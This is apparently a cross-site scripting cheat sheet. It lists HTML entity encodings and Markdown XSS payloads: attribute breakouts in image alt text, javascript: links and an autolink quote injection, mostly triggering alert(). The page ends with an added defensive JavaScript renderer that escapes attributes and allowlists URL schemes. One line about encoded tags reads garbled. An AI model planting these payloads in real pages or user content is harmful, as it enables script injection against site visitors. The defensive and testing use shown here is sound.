XSS Payload Expansion
Alternative Tag Encoding
Tag | Hex Code | Decimal |
---|---|---|
< | &#x3C; | &#60; |
> | &#x3E; | &#62; |
" | &#x22; | &#34; |
= | &#x3D; | &#61; |
( | &#x28; | &#40; |
) | &#x29; | &#41; |
; | &#x3B; | &#59; |
Payload to use: <h1> written with the encoded characters => <h1>, or <script> written with the encoded characters => <script>.
XSS on Markdown Format
Image
![" onmouseover="alert(1);](https://evil.com/random.png)
![TEST](x"/onerror="alert`/Oops/`)
URL / Anchor href
[TEST](javascript:alert(document.domain))
[" onmouseover="alert(1);](javascript:alert(document.domain))
<https://evil.com" onmouseover="alert(1)>
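Added example (not part of the original page): a defensive rendering check for the Markdown strings above. It escapes every attribute value and allowlists URL schemes, so the alt-text and autolink quotes stay inside their attribute and the javascript: targets are never emitted as links. The names `escapeHtml`, `safeUrl`, `renderInline` and the scheme list are assumptions made for this example, and relative URLs are refused for simplicity.

```javascript
// Added example, not from the original page; all names are hypothetical.
const ALLOWED_SCHEMES = new Set(["http:", "https:", "mailto:"]);

// Encode characters that can close an attribute value or open a tag,
// as decimal character references.
function escapeHtml(s) {
  return s.replace(/[&<>"'`]/g, (c) => `&#${c.charCodeAt(0)};`);
}

// Return the normalized URL when it is absolute and allowlisted, else null.
function safeUrl(raw) {
  // Whitespace, control characters, quotes and angle brackets are refused
  // outright; this also covers a scheme split by a tab or newline.
  if (/[\u0000-\u0020"'`<>]/.test(raw)) return null;
  let url;
  try {
    url = new URL(raw);
  } catch {
    return null; // relative or malformed: this strict example refuses it
  }
  return ALLOWED_SCHEMES.has(url.protocol) ? url.href : null;
}

// Render ![alt](src), [text](href) and <autolink>; everything else is escaped.
function renderInline(md) {
  const token = /(!?)\[([^\]]*)\]\(([^)]*)\)|<([a-z][a-z0-9+.-]*:[^>]*)>/gi;
  let out = "";
  let last = 0;
  for (const m of md.matchAll(token)) {
    const [whole, bang, label, target, autolink] = m;
    const dest = autolink === undefined ? target : autolink;
    out += escapeHtml(md.slice(last, m.index));
    last = m.index + whole.length;
    const url = safeUrl(dest);
    if (url === null) {
      out += escapeHtml(whole); // refused target: emit the source as inert text
    } else if (bang) {
      out += `<img src="${escapeHtml(url)}" alt="${escapeHtml(label)}">`;
    } else {
      const text = autolink === undefined ? label : autolink;
      out += `<a href="${escapeHtml(url)}" rel="noopener noreferrer">${escapeHtml(text)}</a>`;
    }
  }
  return out + escapeHtml(md.slice(last));
}

// Two of the Markdown strings from this section, used as regression inputs.
console.log(renderInline('![" onmouseover="alert(1);](https://evil.com/random.png)'));
console.log(renderInline("[TEST](javascript:alert(document.domain))"));
```

Keeping the page's strings as regression inputs for whichever Markdown renderer is actually deployed shows whether its output ever contains an unescaped quote or a non-allowlisted scheme.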